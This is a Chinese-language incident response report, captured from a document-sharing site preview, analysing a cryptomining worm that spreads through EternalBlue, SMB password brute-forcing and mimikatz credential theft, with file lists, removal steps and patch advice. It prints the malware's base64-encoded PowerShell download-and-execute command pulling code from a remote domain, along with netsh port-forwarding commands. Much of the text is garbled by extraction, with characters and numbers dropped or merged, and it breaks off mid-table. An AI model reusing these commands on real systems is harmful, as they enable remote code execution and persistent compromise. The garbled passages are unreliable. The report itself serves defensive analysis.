2021挖礦病毒應(yīng)急響應(yīng)報(bào)告_第1頁(yè)
2021挖礦病毒應(yīng)急響應(yīng)報(bào)告_第2頁(yè)
2021挖礦病毒應(yīng)急響應(yīng)報(bào)告_第3頁(yè)
2021挖礦病毒應(yīng)急響應(yīng)報(bào)告_第4頁(yè)
2021挖礦病毒應(yīng)急響應(yīng)報(bào)告_第5頁(yè)
已閱讀5頁(yè),還剩23頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶(hù)提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

挖礦病毒應(yīng)急響應(yīng)報(bào)告2021目錄前言 3背景 3術(shù)語(yǔ)表 4病毒特征 5病毒文件 5系統(tǒng)服務(wù) 6Ddriver 6WebServers 6計(jì)劃任務(wù) 7Ddrivers 7DnsScan 8WebServers 8Bluetooths 8手工清除方法 9計(jì)劃任務(wù)或服務(wù) 9病毒文件 9注冊(cè)表 9防火墻或端口轉(zhuǎn)發(fā) 10病毒分析 10主程序 10釋放并配置 104.1.2挖礦 14橫向傳播程序 16反編譯 174.2.2解包 184.2.3傳播過(guò)程 19升級(jí)程序 24應(yīng)對(duì)措施及建議 25威脅指標(biāo)(IOCS) 266.1MD5 266.2DOMAIN 266.3IP 26URL 26弱口令 26參考資料 28前言背景2019423XXX200DCS經(jīng)研究分析發(fā)現(xiàn),該病毒為驅(qū)動(dòng)人生挖礦病毒的一種,它通過(guò)“永恒之SMB礦操作。20181214不斷增強(qiáng)。下表是該團(tuán)伙主要活動(dòng)情況的時(shí)間線(xiàn):表1驅(qū)動(dòng)人生黑產(chǎn)團(tuán)伙活動(dòng)時(shí)間線(xiàn)序號(hào)時(shí)間木馬行為變化120181214利用“驅(qū)動(dòng)人生”系列軟件升級(jí)通道下發(fā),利用“永恒之藍(lán)”漏洞攻擊傳播。220181219下發(fā)之后的木馬新增PowerShell后門(mén)安裝。32019年1月09日檢測(cè)到挖礦組件xmrig-32.mlz/xmrig-64.mlz下載。42019年1月24日木馬將挖礦組件、升級(jí)后門(mén)組件分別安裝為計(jì)劃任務(wù),并同時(shí)安裝PowerShell后門(mén)。52019年1月25日124件安裝為計(jì)劃任務(wù),在攻擊時(shí)新增利用mimikatz,SMBPowerShellmshta劃任務(wù)。62019年2月10日將攻擊模塊打包方式改為Pyinstaller。72019年2月20日XMRig進(jìn)程啟動(dòng)挖礦。82019年2月23日攻擊方法再次更新,新增MSSQL爆破攻擊。92019年2月25日223MSSQL攻擊方法集成永恒之藍(lán)漏洞攻擊、SMB擊、MsSQL爆破攻擊,同時(shí)使用黑客工具mimiktaz、psexec進(jìn)行輔助攻擊。102019328225CPU相關(guān)的驅(qū)動(dòng),使用顯卡進(jìn)行挖礦。由此可見(jiàn),中石化某煉化廠的病毒比較符合2019年2月10日版本。術(shù)語(yǔ)表定義本報(bào)告中涉及的重要術(shù)語(yǔ),為讀者在閱讀報(bào)告時(shí)提供必要的參考信息。表2術(shù)語(yǔ)表序號(hào)術(shù)語(yǔ)或縮略語(yǔ)說(shuō)明性定義1mimikatzmimikatzCWindowsKerberospass-the-hash、pass-the-ticket、buildGoldentickets2PowerShellWindowsPowerShell是一種命令行外殼程序和腳本環(huán)境,使命令行用戶(hù)和腳本編寫(xiě)者可以利用.NETFramework的強(qiáng)大功能。3PSEXECpsexec是一個(gè)遠(yuǎn)程執(zhí)行工具,你可以像使用telnet一樣使用它。4PyinstallerPyInstallerPythonPython釋器或任何模塊即可運(yùn)行打包的應(yīng)用程序。5PythonPython語(yǔ)言新功能的添加,越來(lái)越多被用于獨(dú)立的、大型項(xiàng)目的開(kāi)發(fā)。6驅(qū)動(dòng)人生驅(qū)動(dòng)人生是一款免費(fèi)的驅(qū)動(dòng)管理軟件,實(shí)現(xiàn)智能檢測(cè)硬件并自動(dòng)查找安裝驅(qū)動(dòng),為用戶(hù)提供最新驅(qū)動(dòng)更新,本機(jī)驅(qū)動(dòng)備份、還原和卸載等功能。7永恒之藍(lán)2017414ShadowBrokers(影子經(jīng)紀(jì)人)絡(luò)攻擊工具,其中包含“永恒之藍(lán)”工具,WindowsSMB以獲取系統(tǒng)最高權(quán)限。病毒特征病毒文件當(dāng)前版本病毒感染過(guò)程中,所產(chǎn)生的病毒文件如下表所示:表3病毒相關(guān)文件序號(hào)文件位置及名稱(chēng)功能與作用1C:\Windows\system32\svhost.exe主程序。2C:\Windows\SysWOW64\svhost.exe3C:\Windows\system32\drivers\svchost.exe4C:\Windows\SysWOW64\drivers\svchost.exe5C:\Windows\temp\svvhost.exe橫向傳播程序。6C:\Windows\temp\svchost.exe7C:\Windows\system32\wmiex.exe后門(mén)程序。8C:\Windows\SysWOW64\wmiex.exe9C:\Windows\system32\drivers\taskmgr.exe任務(wù)管理器偽裝程序。10C:\Windows\SysWOW64\drivers\taskmgr.exe11C:\Windows\temp\m.ps1mimikatz程序。12C:\Windows\temp\mkatz.inimimikatz結(jié)果。13C:\Windows\temp\p.bat“永恒之藍(lán)”漏洞橫向傳播產(chǎn)生的腳本文件。14C:\installed.exe“永恒之藍(lán)”漏洞橫向傳播的主程序。15$env:temp\update.exe主程序的更新文件。系統(tǒng)服務(wù)當(dāng)前版本病毒共安裝兩個(gè)服務(wù),分別是Ddriver、WebServers。DdriverDdriver云控指令,其服務(wù)信息如下:服務(wù)名:Ddriver可執(zhí)行文件路徑:C:\Windows\system32\drivers\svchost.exe圖1服務(wù)Ddriver(注:本圖為后期復(fù)現(xiàn)所截)WebServersWebServerswmiex.exe,他文件、上報(bào)信息、管理服務(wù)進(jìn)程,其服務(wù)信息如下:服務(wù)名:WebServers可執(zhí)行文件路徑:C:\Windows\system32\wmiex.exe圖2服務(wù)WebServers(注:本圖為后期復(fù)現(xiàn)所截)計(jì)劃任務(wù)當(dāng)前版本病毒共安裝四個(gè)計(jì)劃任務(wù),如下圖所示:圖3計(jì)劃任務(wù)DdriversDdriversDdriver征如下:計(jì)劃任務(wù)名:Ddrivers啟動(dòng)路徑:cmd.exe/cC:\Windows\system32\drivers\svchost.exe00:50:00DnsScanDnsScanSMB口令爆破、PSEXEC、MimiKatz計(jì)劃任務(wù)名:DnsScan啟動(dòng)程序:C:\Windows\Temp\svchost.exe1WebServersWebServerswmiex.exe,WebServers計(jì)劃任務(wù)名:WebServers啟動(dòng)程序:cmd.exe/cC:\Windows\system32\wmiex.exe00:50:00Bluetooths計(jì)劃任務(wù)\Microsoft\windows\Bluetooths是負(fù)責(zé)下載執(zhí)行遠(yuǎn)程Powershell指令,其特征如下:計(jì)劃任務(wù)名:Bluetooths啟動(dòng)程序:powershell-epbypass-eSQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=00:50:00-epbypass–eIEX(New-ObjectNet.WebClient).downloadstring('/v'+$env:USERDOMAIN))手工清除方法計(jì)劃任務(wù)或服務(wù)需刪除計(jì)劃任務(wù),結(jié)束病毒進(jìn)程并刪除服務(wù),具體如下:DdriversWebServersDnsScan刪除名為\Microsoft\Windows\Bluetoothswmiex.exe“svchost”svchostsvchost“WindowsDdriverWebServers病毒文件需刪除下載或釋放的病毒文件,路徑如下:C:\Windows\system32\svhost.exeC:\Windows\SysWOW64\svhost.exeC:\Windows\system32\drivers\svchost.exeC:\Windows\SysWOW64\drivers\svchost.exeC:\Windows\temp\svvhost.exeC:\Windows\temp\svchost.exeC:\Windows\system32\wmiex.exeC:\Windows\SysWOW64\wmiex.exeC:\Windows\system32\drivers\taskmgr.exeC:\Windows\SysWOW64\drivers\taskmgr.exeC:\Windows\temp\m.ps1C:\Windows\temp\mkatz.iniC:\Windows\temp\p.batC:\installed.exe$env:temp\update.exe注冊(cè)表需刪除病毒創(chuàng)建的注冊(cè)表項(xiàng):HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DdriverHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WebServers防火墻或端口轉(zhuǎn)發(fā)需刪除病毒設(shè)置的防火墻欄目有:UDP,65532UDP2,65531ShareService,65533需刪除病毒設(shè)置的端口轉(zhuǎn)發(fā)的設(shè)置,CMDnetshinterfaceportproxydeletev4tov4listenport=65531netshinterfaceportproxydeletev4tov4listenport=65532病毒分析主程序C:\Windows\system32\driverssvchost.exe,IDA釋放并配置Ddriver染配置行為。圖4主函數(shù)入口svhostsvchost.exe,svhostsvchost.exePEC:\Windows\temp\ttt.exe,釋放完成后便執(zhí)行該文件。圖5釋放主程序中102號(hào)資源文件圖6加密狀態(tài)的102號(hào)資源文件ttt.execmd的挖礦程序,為新版挖礦程序的安裝和運(yùn)行清理環(huán)境。圖7結(jié)束或刪除老版的挖礦程序Windows65531,65532,65533UDP2,UDP,ShareService,65532的流量轉(zhuǎn)發(fā)到地址的53端口,將來(lái)自65531端口的流量轉(zhuǎn)發(fā)到地址的53端口。圖8Windows防火墻中的增項(xiàng)圖9端口代理C:\Windows\system32\svhost.exeC:\Windows\system32\drivers\svchost.exe,之后設(shè)置計(jì)劃任務(wù)同時(shí)設(shè)置注冊(cè)表項(xiàng),實(shí)現(xiàn)程序的開(kāi)機(jī)啟動(dòng)和定期觸發(fā)執(zhí)行。圖10拷貝主程序文件到系統(tǒng)關(guān)鍵目錄下圖11設(shè)置計(jì)劃任務(wù)和注冊(cè)表項(xiàng)CreateServiceACreateServiceACMDsccreatenetstartStartServiceA服務(wù)函數(shù)。圖12創(chuàng)建Ddriver服務(wù)挖礦服務(wù)主函數(shù)中首先根據(jù)系統(tǒng)位數(shù)拼接后續(xù)將要使用到的字符串資源,包括從而已域名臨時(shí)下載的文件以及解密之后的文件,和后續(xù)用來(lái)偽裝成任務(wù)管理器共享進(jìn)程進(jìn)行挖礦操作taskmgr.exe。圖13拼接后續(xù)需要使用的字符串創(chuàng)建名為“itisholyshit”的互斥體防止進(jìn)程重復(fù)啟動(dòng)運(yùn)行,根據(jù)系統(tǒng)位數(shù)解密釋放對(duì)應(yīng)的資源文件,64100,32101C:\Windows\system32\drivers\taskmgr.exe(64位系統(tǒng):C:\Windows\SysWOW64\drivers\taskmgr.exe)。圖14根據(jù)系統(tǒng)位數(shù)釋放taskmgr.exe文件之后創(chuàng)建4個(gè)線(xiàn)程分別進(jìn)行相關(guān)的惡意操作:taskmgr.exe,使其不被用戶(hù)發(fā)現(xiàn);10sC:\Windows\temp\svchost.exe(文件),實(shí)現(xiàn)內(nèi)網(wǎng)的橫向感染傳播;Wmic10程;65533圖15根據(jù)主機(jī)進(jìn)程決定是否暫時(shí)關(guān)閉偽裝進(jìn)程圖16使用WMIC檢查進(jìn)程并決定是否關(guān)閉挖礦程序C:\Windows\temp\ttt.exeWebServers,WebServers圖17釋放的ttt.exe文件被移動(dòng)到指定路徑橫向傳播程序在C:\Windows\Temp目錄中發(fā)現(xiàn)svchost.exe文件,如下圖所示:圖18橫向傳播程序右鍵查看其屬性,如下圖所示:圖19橫向傳播程序文件屬性反編譯將svchost.exe拖進(jìn)IDA進(jìn)行反編譯,如下圖所示:圖20橫向傳播程序入口函數(shù)通過(guò)閱讀匯編代碼并無(wú)大發(fā)現(xiàn)。view->opensubview->string如下圖所示:圖21字符串資源MSVCR90.dll、KERNEL32.dll、PYTHON27.DLLDLLPythonPyinstaller解包使用工具python-exe-unpacker(下載地址:/security/python-exe-unpacker)對(duì)svchost.exe進(jìn)行解包,如下圖所示:圖22將exe文件解包成python解包后,共有兩個(gè)文件,分別是:ii.py.py、ii.py.pyc,ii.py.py是源代碼文件,ii.py.pyc是源代碼編譯后文件。Python程序ii.py.py的程序結(jié)構(gòu)如下圖所示:圖23橫向傳播程序的結(jié)構(gòu)傳播過(guò)程通過(guò)閱讀與分析Python程序ii.py.py,其橫向傳播過(guò)程如下圖所示:圖24橫向傳播過(guò)程svchost.exe60124svchost.exe。然后,svchost.exek8h3d除。圖25刪除k8h3d用戶(hù)然后,svchost.exe將會(huì)檢測(cè)本機(jī)是否已感染,如果本機(jī)已經(jīng)被感染,則讀取本地病毒文件。圖26檢測(cè)本機(jī)是否感染然后,svchost.exepowershell,DnsScan、\Microsoft\windows\BluetoothsAutocheck5050C:\Windows\temp\svchost.exe圖27利用mimikatz提取內(nèi)存中的密碼和憑證然后,svchost.exeC:\Windows\temp\m.ps1powershellmimikatzCats.ps1的代碼一致。然后,svchost.exeC:\Windows\temp\m.ps1,系統(tǒng)內(nèi)存中提取明文密碼、哈希、PINKerberosC:\Windows\temp\mkatz.ini,如下圖所示:圖28提取出的密碼信息然后,svchost.exewmicntdomaingetdomainname然后,svchost.exefind_ipipconfig/allnetstat-naip、網(wǎng)段等信息。圖29獲取IP或IP段SMB用兩種。圖30爆破SMB服務(wù)scansmbscan2445、6553365533validate圖31通過(guò)SMB服務(wù)橫向傳播validateSMB破。如果爆破成功,將本橫向傳播程序復(fù)制到被攻擊的主機(jī)中并運(yùn)行。除此之外,svchost.exe將會(huì)通過(guò)“永恒之藍(lán)”漏洞進(jìn)行傳播。圖32“永恒之藍(lán)”漏洞橫向傳播check_thread圖33利用“永恒之藍(lán)”漏洞橫向傳播文件smb_pwnC:\installed.exeC:\Windows\temp\p.bat圖34利用“永恒之藍(lán)”漏洞執(zhí)行命令腳本C:\Windows\temp\p.bat的主要作用有:命令netshinterfaceipv6installipv6;命令netshfirewalladdportopeningtcp65532DNS265532命令netshinterfaceportproxyaddv4tov4listenport=65532connectaddress=connectport=53655353d)同理,它將開(kāi)啟65531端口,并將其轉(zhuǎn)發(fā)至:53;隨后將創(chuàng)建\Microsoft\windows\Bluetooths、Autocheck務(wù);Ddrivercmd.exe10k8h3dC:\Windows\temp\p.bat到此為止,病毒的橫向傳播就結(jié)束了。升級(jí)程序計(jì)劃任務(wù)\Microsoft\windows\Bluetooths50PowerShell通過(guò)分析腳本代碼,發(fā)現(xiàn)它是經(jīng)過(guò)多層混淆,解密后的內(nèi)容如下圖所示:它的主要作用是:

圖35升級(jí)程序腳本Maczhudongfangyu等信息;Ddriver$env:temp\update.exe并運(yùn)行;感染后,收集主機(jī)信息并發(fā)送到遠(yuǎn)程服務(wù)器,收集的信息包括主機(jī)ID,GUID,MAC,CPU程服務(wù)器。應(yīng)對(duì)措施及建議碼;主機(jī)使用高強(qiáng)度密碼,切勿使用弱口令,防止黑客暴力破解;內(nèi)網(wǎng)使用共享的主機(jī)打上“永恒之藍(lán)”漏洞補(bǔ)?。?),防止利用此漏洞的橫向攻擊;表4“永恒之藍(lán)”漏洞補(bǔ)丁序號(hào)Windows系統(tǒng)版本補(bǔ)丁編號(hào)1Windows2000SP4無(wú)2WindowsXPSP3KB40125983WindowsServer2003SP2KB40125984WindowsVistaSP2KB40125985Windows7SP1KB4012212、KB40122156WindowsServer2008SP2KB40119817WindowsServer2008R2SP1KB4012212、KB40122158Wind

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶(hù)所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶(hù)上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶(hù)上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶(hù)因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論